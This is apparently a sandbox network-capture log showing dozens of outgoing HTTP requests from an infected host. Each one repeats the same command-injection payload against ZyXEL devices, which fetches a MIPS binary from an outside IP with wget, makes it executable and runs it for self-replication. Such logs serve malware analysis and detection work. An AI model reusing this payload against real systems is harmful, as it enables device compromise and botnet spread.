                                                Jan 12, 2024 18:16:15.255083084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2440192.168.2.235250699.11.44.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255126953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2441192.168.2.2333628122.130.31.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255179882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2442192.168.2.2358780167.75.171.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255208015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2443192.168.2.2351306201.193.162.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255254984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2444192.168.2.2342684170.43.238.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255285025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2445192.168.2.234698859.45.131.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255330086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2446192.168.2.234447277.227.251.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255378962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2447192.168.2.236036017.78.182.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255440950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2448192.168.2.2340442105.237.81.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255466938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2449192.168.2.235099490.184.130.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255487919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2450192.168.2.2336030164.106.142.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255512953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2451192.168.2.233713072.11.172.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255561113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2452192.168.2.2333876160.82.203.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255618095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2453192.168.2.2355812137.50.160.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255639076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2454192.168.2.2345498143.176.170.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255681038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2455192.168.2.235135875.243.168.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255714893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2456192.168.2.2349566156.250.133.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255757093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2457192.168.2.2339086154.107.236.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255788088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2458192.168.2.2352762102.17.149.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255831957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2459192.168.2.2354554148.23.130.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255861044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2460192.168.2.234394042.14.174.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255891085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2461192.168.2.235026889.159.190.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.255959034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2462192.168.2.2347628138.74.238.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256004095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2463192.168.2.2336734114.186.27.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256067038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2464192.168.2.2352564103.95.155.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256089926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2465192.168.2.2337446129.146.171.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256125927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2466192.168.2.235972091.146.152.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256148100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2467192.168.2.235908458.244.155.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256198883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2468192.168.2.2351396148.59.58.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256227970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2469192.168.2.2340584189.58.227.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256253958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2470192.168.2.2341446212.7.36.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256320953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2471192.168.2.2353360118.234.148.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256346941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2472192.168.2.235161264.99.89.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256390095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2473192.168.2.2354510211.192.252.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256422997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2474192.168.2.2339290159.193.12.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256452084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2475192.168.2.234024068.108.95.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256490946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2476192.168.2.2335954213.112.24.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256521940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2477192.168.2.233494887.19.82.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256542921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2478192.168.2.235517053.192.4.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256594896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2479192.168.2.2355294103.249.231.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256614923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2480192.168.2.2346064113.213.212.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256654024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2481192.168.2.235186297.149.238.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256699085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2482192.168.2.2347202211.161.212.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256725073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2483192.168.2.2358474120.181.154.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256762028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2484192.168.2.2341776121.79.95.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256798983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2485192.168.2.23516421.57.117.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256860018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2486192.168.2.2337240204.77.132.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256877899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2487192.168.2.2343028185.52.250.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256901979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2488192.168.2.235957039.10.145.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256943941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2489192.168.2.2356758116.27.90.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.256999969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2490192.168.2.23351401.181.55.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257015944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2491192.168.2.2355224152.58.255.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257064104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2492192.168.2.235909669.194.80.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257095098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2493192.168.2.234742059.185.120.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257138014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2494192.168.2.235377423.169.34.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257148027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2495192.168.2.2333342217.58.80.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257185936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2496192.168.2.2360294119.20.251.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257240057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2497192.168.2.23330004.157.90.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257265091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2498192.168.2.2341150204.6.141.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257311106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2499192.168.2.2336420137.111.154.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257334948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2500192.168.2.234470651.31.167.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257390022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2501192.168.2.2347954223.73.225.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.257421970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2502192.168.2.2340912105.227.141.42443
                                                TimestampBytes transferredDirectionData
